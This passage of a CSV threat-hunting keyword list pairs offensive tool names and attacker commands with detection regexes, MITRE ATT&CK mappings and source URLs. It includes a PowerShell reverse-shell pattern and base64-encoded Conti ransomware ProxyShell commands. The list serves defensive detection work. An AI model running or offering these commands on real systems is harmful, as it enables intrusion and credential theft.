begun on Extended File System and HFS+ support.","T1003 - T1039 - T1046 - T1057","TA0005 - TA0007 - TA0010","N/A","N/A","Information Gathering","https://github.com/Invoke-IR/PowerForensics","1","1","N/A","N/A","10","1357","276","2023-11-16T10:31:37Z","2015-03-07T17:12:19Z" "*powerglot.py*",".{0,1000}powerglot\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*powerkatz.dll*",".{0,1000}powerkatz\.dll.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*powerkatz_x64.dll*",".{0,1000}powerkatz_x64\.dll.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*powerkatz_x86.dll*",".{0,1000}powerkatz_x86\.dll.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*PowerLessShell*",".{0,1000}PowerLessShell.{0,1000}","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1445","249","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" "*PowerLessShell.py*",".{0,1000}PowerLessShell\.py.{0,1000}","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1445","249","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" "*powermad.ps1*",".{0,1000}powermad\.ps1.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1123","168","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" "*Powermad.psd1*",".{0,1000}Powermad\.psd1.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1123","168","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" "*Powermad.psm1*",".{0,1000}Powermad\.psm1.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1123","168","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" "*Powermad-master*",".{0,1000}Powermad\-master.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1123","168","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" "*PowerMemory*",".{0,1000}PowerMemory.{0,1000}","offensive_tool_keyword","PowerMemory","Exploit the credentials present in files and memory","T1003 - T1555 - T1213 - T1558","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/giMini/PowerMemory","1","0","N/A","N/A","9","835","221","2023-05-25T17:58:53Z","2015-08-29T17:09:23Z" "*PowerOPS*",".{0,1000}PowerOPS.{0,1000}","offensive_tool_keyword","PowerOPS","PowerOPS is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a powershell runspace environment (.NET). It intends to include multiple offensive PowerShell modules to make the process of Post Exploitation easier.","T1059 - T1027 - T1053 - T1129 - T1086","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/fdiskyou/PowerOPS","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powerpick -Command *",".{0,1000}powerpick\s\-Command\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*powerpick.py*",".{0,1000}powerpick\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*PowerPick.x64.dll*",".{0,1000}PowerPick\.x64\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Powerpreter.psm1*",".{0,1000}Powerpreter\.psm1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Powerpreter.psm1*",".{0,1000}Powerpreter\.psm1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*powerpreter.psm1*",".{0,1000}powerpreter\.psm1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*powerpwn.powerdump*",".{0,1000}powerpwn\.powerdump.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*powerpwn_tests*",".{0,1000}powerpwn_tests.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*power-pwn-main*",".{0,1000}power\-pwn\-main.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*PowerSCCM.ps1*",".{0,1000}PowerSCCM\.ps1.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","327","109","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" "*PowerSCCM.psd1*",".{0,1000}PowerSCCM\.psd1.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","327","109","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" "*PowerSCCM.psm1*",".{0,1000}PowerSCCM\.psm1.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","327","109","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" "*PowerSCCM-master*",".{0,1000}PowerSCCM\-master.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","327","109","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" "*powerseb/PowerExtract*",".{0,1000}powerseb\/PowerExtract.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","2","106","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "*powerseb/PowerExtract*",".{0,1000}powerseb\/PowerExtract.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","2","106","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "*PowerSharpBinaries*",".{0,1000}PowerSharpBinaries.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*PowerSharpPack.ps1*",".{0,1000}PowerSharpPack\.ps1.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*PowerSharpPack-master*",".{0,1000}PowerSharpPack\-master.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*PowerShdll*",".{0,1000}PowerShdll.{0,1000}","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","1","N/A","N/A","10","1711","251","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" "*powershell *C:\Users\Public\*.exe* forfiles.exe /p *\system32 *.exe**",".{0,1000}powershell\s.{0,1000}C\:\\Users\\Public\\.{0,1000}\.exe.{0,1000}\sforfiles\.exe\s\/p\s.{0,1000}\\system32\s.{0,1000}\.exe.{0,1000}.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*powershell *Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -property * | findstr*",".{0,1000}powershell\s.{0,1000}Get\-EventLog\s\-LogName\ssecurity\s\-Newest\s500\s\|\swhere\s\{\$_\.EventID\s\-eq\s4624\}\s\|\sformat\-list\s\-property\s.{0,1000}\s\|\sfindstr.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell -c *New-Object System.Net.Sockets.TCPClient(""*$sendback = (iex *$data* 2>&1 | Out-String*",".{0,1000}powershell\s\-c\s.{0,1000}New\-Object\sSystem\.Net\.Sockets\.TCPClient\(\"".{0,1000}\$sendback\s\=\s\(iex\s.{0,1000}\$data.{0,1000}\s2\>\&1\s\|\sOut\-String.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*powershell -enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AbAB0AGUAcwB0ACAALwBkAGMAbABpAHMAdAA6ACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*",".{0,1000}powershell\s\-enc\scwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AbAB0AGUAcwB0ACAALwBkAGMAbABpAHMAdAA6ACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA\=.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #5","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell -enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AZQB0ACAAZwByAG8AdQBwACAAIgBkAG8AbQBhAGkAbgAgAGMAbwBtAHAAdQB0AGUAcgBzACIAIAAvAGQAbwBtAGEAaQBuACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*",".{0,1000}powershell\s\-enc\scwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AZQB0ACAAZwByAG8AdQBwACAAIgBkAG8AbQBhAGkAbgAgAGMAbwBtAHAAdQB0AGUAcgBzACIAIAAvAGQAbwBtAGEAaQBuACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA\=.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #5","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell -enc cwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAAoAGkAZQB4ACgAJwBsAHMAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAAnACkAfABPAHUAdAAtAFMAdAByAGkAbgBnACkA*",".{0,1000}powershell\s\-enc\scwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAAoAGkAZQB4ACgAJwBsAHMAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAAnACkAfABPAHUAdAAtAFMAdAByAGkAbgBnACkA.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #2","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell -enc cwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAB0AGUAcwBlAHQA*",".{0,1000}powershell\s\-enc\scwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAB0AGUAcwBlAHQA.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #6","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell -enc dwBoAG8AYQBtAGkA*",".{0,1000}powershell\s\-enc\sdwBoAG8AYQBtAGkA.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #1","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell -enc JABhAD0AIgBQAEMAVgBBAEkARgBCAGgAWgAyAFUAZwBUAEcARgB1AFoAMwBWAGgAWgAyAFUAOQBJAGsATQBqAEkAaQBCAEUAWgBXAEoAMQBaAHoAMABpAGQASABKADEAWgBTAEkAZwBkAG0ARgBzAGEAVwBSAGgAZABHAFYAUwBaAFgARgAxAFoAWABOADAAUABTAEoAbQBZAFcAeAB6AFoAUwBJAGcASgBUADQATgBDAGoAdwBsAFEAQwBCAEoAYgBYAEIAdgBjAG4AUQBnAFQAbQBGAHQAWgBYAE4AdwBZAFcATgBsAFAAUwBKAFQAZQBYAE4AMABaAFcAMAB1AFIARwBsAGgAWgAyADUAdgBjADMAUgBwAFkAMwBNAGkASQBDAFUAKwBEAFEAbwA4AEoAVQBBAGcAUwBXADEAdwBiADMASgAwAEkARQA1AGgAYgBXAFYAegBjAEcARgBqAFoAVAAwAGkAVQAzAGwAegBkAEcAVgB0AEwAawBsAFAASQBpAEEAbABQAGcAMABLAFAAQwBWAEEASQBFAGwAdABjAEcAOQB5AGQAQwBCAE8AWQBXADEAbABjADMAQgBoAFkAMgBVADkASQBsAE4ANQBjADMAUgBsAGIAUwBJAGcASgBUADQATgBDAGoAdwBsAFEAQwBCAEoAYgBYAEIAdgBjAG4AUQBnAFQAbQBGAHQAWgBYAE4AdwBZAFcATgBsAFAAUwBKAFQAZQBYAE4AMABaAFcAMAB1AFUAbgBWAHUAZABHAGwAdABaAFMANQBUAFoAWABKAHAAWQBXAHgAcABlAG0ARgAwAGEAVwA5AHUATABrAFoAdgBjAG0AMQBoAGQASABSAGwAYwBuAE0AdQBRAG0AbAB1AFkAWABKADUASQBpAEEAbABQAGcAMABLAFAASABOAGoAYwBtAGwAdwBkAEMAQgB5AGQAVwA1AGgAZABEADAAaQBjADIAVgB5AGQAbQBWAHkASQBqADQATgBDAG4AQgB5AGIAMwBSAGwAWQAzAFIAbABaAEMAQgB6AGQASABKAHAAYgBtAGMAZwBSAFgAaABqAGEARwBGAHUAWgAyAFYAUwBkAFcANQAwAGEAVwAxAGwASwBDAGsATgBDAG4AcwBOAEMAZwBsAHkAWgBYAFIAMQBjAG0ANABnAGMAeQA1AFUAWgBYAGgAMABMAGwAUgB2AFUAMwBSAHkAYQBXADUAbgBLAEMAawA3AEQAUQBwADkARABRAHAAdwBjAG0AOQAwAFoAVwBOADAAWgBXAFEAZwBkAG0AOQBwAFoAQwBCAEUAWQBYAFIAaABZAG0ARgB6AFoAUwBoAE4AWgBXADEAdgBjAG4AbABUAGQASABKAGwAWQBXADAAZwBiAFMAeABDAGEAVwA1AGgAYwBuAGwARwBiADMASgB0AFkAWABSADAAWgBYAEkAZwBZAGkAawBOAEMAbgBzAE4AQwBnAGsASgBiAFMANQBRAGIAMwBOAHAAZABHAGwAdgBiAGkAQQA5AEkARABBADcARABRAG8ASgBDAFcASQB1AFIARwBWAHoAWgBYAEoAcABZAFcAeABwAGUAbQBVAG8AYgBTAGsANwBEAFEAcAA5AEQAUQBwAHcAYwBtADkAMABaAFcATgAwAFoAVwBRAGcAZABtADkAcABaAEMAQgBEAFgAMABOAHMAYQBXAE4AcgBLAEcAOQBpAGEAbQBWAGoAZABDAEIAegBaAFcANQBrAFoAWABJAHMASQBFAFYAMgBaAFcANQAwAFEAWABKAG4AYwB5AEIAbABLAFEAMABLAGUAdwAwAEsAQwBRAGwAQwBlAFgAUgBsAFcAMQAwAGcAVQB5AEEAOQBJAEYATgA1AGMAMwBSAGwAYgBTADUARABiADIANQAyAFoAWABKADAATABrAFoAeQBiADIAMQBDAFkAWABOAGwATgBqAFIAVABkAEgASgBwAGIAbQBjAG8AUgBYAGgAagBhAEcARgB1AFoAMgBWAFMAZABXADUAMABhAFcAMQBsAEsAQwBrAHAATwB3ADAASwBDAFEAbABOAFoAVwAxAHYAYwBuAGwAVABkAEgASgBsAFkAVwAwAGcAYgBTAEEAOQBJAEcANQBsAGQAeQBCAE4AWgBXADEAdgBjAG4AbABUAGQASABKAGwAWQBXADAAbwBVAHkAawA3AEQAUQBvAEoAQwBVAEoAcABiAG0ARgB5AGUAVQBaAHYAYwBtADEAaABkAEgAUgBsAGMAaQBCAGkASQBEADAAZwBiAG0AVgAzAEkARQBKAHAAYgBtAEYAeQBlAFUAWgB2AGMAbQAxAGgAZABIAFIAbABjAGkAZwBwAE8AdwAwAEsAQwBRAGwARQBZAFgAUgBoAFkAbQBGAHoAWgBTAGgAdABMAEcASQBwAE8AdwAwAEsARABRAHAAOQBEAFEAbwA4AEwAMwBOAGoAYwBtAGwAdwBkAEQANAB